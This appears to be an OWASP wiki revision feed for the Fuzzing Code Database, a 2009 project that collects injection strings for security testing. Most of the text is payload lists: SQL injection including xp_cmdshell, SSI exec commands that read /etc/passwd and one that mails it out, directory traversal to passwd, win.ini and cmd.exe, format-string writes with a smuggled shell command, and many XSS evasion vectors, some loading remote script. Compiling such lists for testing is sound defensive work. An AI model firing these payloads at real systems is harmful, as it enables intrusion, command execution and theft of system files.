&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Format String Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Project Contributor ====&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]&lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']]&lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']]&lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project|Fuzzing Code Database]]&lt;br /&gt;
[[Category:OWASP Document]]&lt;br /&gt;
[[Category:OWASP Alpha Quality Document]]&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67375</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=67375"/>
				<updated>2009-08-07T14:00:32Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated.&lt;br /&gt;
We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
a&amp;quot; or 1=1--&lt;br /&gt;
&amp;quot; or &amp;quot;a&amp;quot; = &amp;quot;a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Full List ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
